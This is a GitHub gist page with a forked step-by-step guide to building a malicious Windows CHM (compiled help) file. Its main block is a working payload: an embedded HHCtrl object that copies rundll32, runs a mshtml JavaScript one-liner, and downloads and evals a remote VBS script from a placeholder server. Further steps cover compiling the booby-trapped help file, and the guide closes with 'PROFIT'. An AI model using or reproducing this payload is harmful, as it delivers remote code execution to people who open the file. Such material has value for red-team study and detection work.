Skip to content

Instantly share code, notes, and snippets.

@askme765cs

askme765cs/Malicious-CHM-Guide.md

Forked from mgeeky/Malicious-CHM-Guide.md
Created February 25, 2021 08:58
Show Gist options
  • Save askme765cs/4a5e9a2c7cce8ecf69117b8857455fa4 to your computer and use it in GitHub Desktop.
Save askme765cs/4a5e9a2c7cce8ecf69117b8857455fa4 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @mgeeky mgeeky created this gist Feb 6, 2018.
    53 changes: 53 additions & 0 deletions Malicious-CHM-Guide.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,53 @@


    ## Procedure for generating Malicious CHM file

    - **Step 0:** Download and install [**Microsoft HTML Help Workshop and Documentation**](https://www.microsoft.com/en-us/download/details.aspx?id=21138)
    - **Step 1:** Obtain a valid CHM file and unpack it using 7-zip
    - **Step 2:** Find an entry-point HTML file within "_docs_" directory and insert the following code into it's `<body>` section:

    ```
    <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
    <PARAM name="Command" value="ShortCut">
    <PARAM name="Button" value="Bitmap::shortcut">
    <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
    <PARAM name="Item2" value="273,1,1">
    </OBJECT>
    <SCRIPT>
    x.Click();
    </SCRIPT>
    ```

    - **Step 3:** Prepare `Project.hpp` file with contents like the below ones:

    ```
    [OPTIONS]
    Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc
    [FILES]
    <PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm
    ```

    Add every file needed by that CHM to the `FILES` section. Remember to include also previously modified malicious HTM file.


    - **Step 4:** Compile the project within CHM directory using `hpp.exe` compiler:

    ```
    <PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
    Microsoft HTML Help Compiler 4.74.8702
    Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm
    Compile time: 0 minutes, 1 second
    353 Topics
    7,208 Local links
    187 Internet links
    2 Graphics
    Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes
    Compression decreased file by 2,091,702 bytes.
    ```

    - **Step 5:** PROFIT.